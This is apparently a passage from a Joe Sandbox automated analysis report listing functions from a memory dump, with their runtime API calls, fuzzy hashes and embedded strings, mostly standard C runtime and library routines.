Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 5ec00f24e5f420df7ed28872df31f105d6e79beb5f5892ca71d9920b1c591c74
Instruction ID: 90109fdefc5f645651bf4b3d49583e40378c29b863746ced5aa3ae9f8eb55d69
Opcode Fuzzy Hash: 5ec00f24e5f420df7ed28872df31f105d6e79beb5f5892ca71d9920b1c591c74
Instruction Fuzzy Hash: 24419272A01209AFDB04DFA8C980B9AF7F9FF89350F2045AAE9149B350D735F941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E88C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F8E88FD
__isleadbyte_l.LIBCMT ref: 6F8E8930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6F8E8961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6F8E89CF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 8ddc41fbb2c8c9eb92bb3018ba75fadd4efd0bf5fa5ea21cdf72daf85e53ef8b
Instruction ID: 31e5e912b7c815045201ce814128435a4789be832ce44b0bbb0f1c00d73339ce
Opcode Fuzzy Hash: 8ddc41fbb2c8c9eb92bb3018ba75fadd4efd0bf5fa5ea21cdf72daf85e53ef8b
Instruction Fuzzy Hash: DC319F31A0835AEFDB14DFA8C8849AE7BB5BF02311F1549EAE4649F1A0D731E940DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6F888470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6F885D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6F8884EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6F8884F0
std::exception::exception.LIBCMT ref: 6F88853C
__CxxThrowException@8.LIBCMT ref: 6F888551

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
Opcode ID: 4ed419913325e1a6b43f7c76ac6c07c104760654b6fefdcadbab24a897e45cfb
Instruction ID: bbae238c1599e719cae39a28d45d14f0a8eb0891ab4ec2045b8e356d3b8e220c
Opcode Fuzzy Hash: 4ed419913325e1a6b43f7c76ac6c07c104760654b6fefdcadbab24a897e45cfb
Instruction Fuzzy Hash: C3316D71901704AFC714CF69C980A9AFBF4FF59210F508A6EE9568BB41D770F644CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F89DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6F89DCC5

Part of subcall function 6F8D9533: std::exception::_Copy_str.LIBCMT ref: 6F8D954E

__CxxThrowException@8.LIBCMT ref: 6F89DCDA

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F89DD09
__CxxThrowException@8.LIBCMT ref: 6F89DD1E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: 1d5d702bf4f9256f248ab60571a283561dfda41089e6e612f4020cceba1608f3
Instruction ID: 626d3780ab1e758b6a96527bae52a886d97cdb0952776d0590e6b6e366eea5ea
Opcode Fuzzy Hash: 1d5d702bf4f9256f248ab60571a283561dfda41089e6e612f4020cceba1608f3
Instruction Fuzzy Hash: 7E313476900309AFD704DF99D84099EB7F8FF94310F4085AEE9199B391D770E604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E2645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6F8E2653

Part of subcall function 6F8D9D66: __FF_MSGBANNER.LIBCMT ref: 6F8D9D7F
Part of subcall function 6F8D9D66: __NMSG_WRITE.LIBCMT ref: 6F8D9D86
Part of subcall function 6F8D9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F8D9BD4,6F871290,8E16AAE4), ref: 6F8D9DAB

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: b84d10b825bc2a2fd7308a0537c96e8a315d4ac623397ac81b245eb429642ce8
Instruction ID: 966a67a111fdcbc09bd5f843ef54e4006fc96f0610806e632a88a8301dc8bb83
Opcode Fuzzy Hash: b84d10b825bc2a2fd7308a0537c96e8a315d4ac623397ac81b245eb429642ce8
Instruction Fuzzy Hash: BA11C433D4571ABBCF152B38A904A9D3795AF833B0B140EE6F8049E1A0DF38D950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F887240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6F8A4410: _malloc.LIBCMT ref: 6F8A446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6F887287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F88729B
_memmove.LIBCMT ref: 6F8872AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F8872B8

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: c35cbbb503aeb18a5c9a3309624e1d95d4be06a1624cc0c8e0d3ad500a064cab
Instruction ID: 329c1c44e16a1d210779c6cf29d1d0a6814c48853af1aff305f3d1e168cccd5c
Opcode Fuzzy Hash: c35cbbb503aeb18a5c9a3309624e1d95d4be06a1624cc0c8e0d3ad500a064cab
Instruction Fuzzy Hash: 1211B9B2A00218BBCB04CF95DC40DCFBB7CEFD9654B0086A9F9059B100E7749A44C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F895A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F895AB9
VariantCopy.OLEAUT32(?,6F909C90), ref: 6F895AC1
VariantClear.OLEAUT32(?), ref: 6F895AE2
__CxxThrowException@8.LIBCMT ref: 6F895AEF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 31b9566d77d4e6d8d51902eea81d191624f8947171ee1ecb0595539e4e0eb389
Instruction ID: dc16dea64b14db4d6b151daa1ff4dc5ffb6961fb11c339cbd99708ac1be21836
Opcode Fuzzy Hash: 31b9566d77d4e6d8d51902eea81d191624f8947171ee1ecb0595539e4e0eb389
Instruction Fuzzy Hash: 3E11B172D05668BFCB00CF9CC8859DEBBB8EF46664F1045ABE824AB300C7746A44C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E0A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6F8E0A86

Part of subcall function 6F8E08B2: __fltout2.LIBCMT ref: 6F8E08DD

__cftog_l.LIBCMT ref: 6F8E0AAC
__cftoe_l.LIBCMT ref: 6F8E0ADE

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: bd4b71020cd25544fb09bb6c106e005840750ef35a7a307b2265aeb40f50c8a2
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 74114E3714024EBBCF165E84DC52CDE3F22BB1A354B499D95FE2859070CB36D5B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D8970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6F8D8A84
_memmove.LIBCMT ref: 6F8D8AA0

Strings

EncodingParameters, xrefs: 6F8D8A41

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: 6387f32957031600321a8faf3a869abb4a52ff23e1b06010d517f837b63e8a4d
Instruction ID: c378d2b2e6d2e8761072dc0fc5a138ec8b4c27bfbe78ec1076e97d3c31203979
Opcode Fuzzy Hash: 6387f32957031600321a8faf3a869abb4a52ff23e1b06010d517f837b63e8a4d
Instruction Fuzzy Hash: F06101B4208341AFD304CF68C880A2AFBE9BFC9754F144A5DF59987391D770E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F87F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6F874760: __CxxThrowException@8.LIBCMT ref: 6F8747F9

Part of subcall function 6F8A8D80: _malloc.LIBCMT ref: 6F8A8D8A
Part of subcall function 6F8A8D80: _malloc.LIBCMT ref: 6F8A8DAF

_memcpy_s.LIBCMT ref: 6F87F282
_memset.LIBCMT ref: 6F87F293

Strings

@, xrefs: 6F87F2DE

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: 28b75a38298195b025fc8a20764ac1203baa4e2efbfc0d7566bb337d7a9a84a5
Instruction ID: f28fd088f925021c1e61dda16260e17be8fcd8e026e955d3cce2addb11cd55ce
Opcode Fuzzy Hash: 28b75a38298195b025fc8a20764ac1203baa4e2efbfc0d7566bb337d7a9a84a5
Instruction Fuzzy Hash: B3518071900348EFDB20CFA8C880BDEBBB4BF55308F1085D9D4596B281DB756A49CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6F874100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F874175
_memmove.LIBCMT ref: 6F8741C6

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

Strings

string too long, xrefs: 6F874170

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 4156514e1e0586a9fac84347ad1aee74c49a53a1034bfed135ce5534a4261a7b
Instruction ID: 5037c8eb678bf1a324d0551ecb664cf9cf669c696df9a8c289d9f4a3bbbac8c8
Opcode Fuzzy Hash: 4156514e1e0586a9fac84347ad1aee74c49a53a1034bfed135ce5534a4261a7b
Instruction Fuzzy Hash: 5F319232310614DBD735AE5CAC80B5EF7E9FBE6664B200E5BE491CF680DB61A84087B1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AC350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8AC39B

Strings

gfff, xrefs: 6F8AC3F7
gfff, xrefs: 6F8AC3A3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: 190e337b4f30c79067e75cfd42293855bfb6811042189ac2658536e84ae7e018
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: A331507190070DAFDB14CF98D980EBEB7B9EF84318F44855CE9159B284D731BA15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8718C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F87194F

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

std::exception::exception.LIBCMT ref: 6F87198E

Part of subcall function 6F8D95C1: std::exception::operator=.LIBCMT ref: 6F8D95DA

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F874067
Part of subcall function 6F874010: _memmove.LIBCMT ref: 6F8740C8

Strings

Clone() is not implemented yet., xrefs: 6F8718ED

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: 05569ace7cb3be5b695c2fa0c6277ecefc21c0a085031810534bf9160b16fcc8
Instruction ID: 1c0bf5be63509f02759e9f20e6f0fdeafb06ac20453f50a4a181544df2d363b8
Opcode Fuzzy Hash: 05569ace7cb3be5b695c2fa0c6277ecefc21c0a085031810534bf9160b16fcc8
Instruction Fuzzy Hash: E0318071805248FFDB14CF98D840BAEFBB8FB45360F104A6EE421AB780DB755509CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A5560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8A5657

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

StringStore: missing InputBuffer argument, xrefs: 6F8A55E0
InputBuffer, xrefs: 6F8A55BF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: 319f54cc9ca09d0ae47e28a04edb071949ef54aa5e58254e206e83d021333ed2
Instruction ID: 856b893741fc51863262469473c49e19fdf8ee4f6b4f0c9c72c487f856f48fab
Opcode Fuzzy Hash: 319f54cc9ca09d0ae47e28a04edb071949ef54aa5e58254e206e83d021333ed2
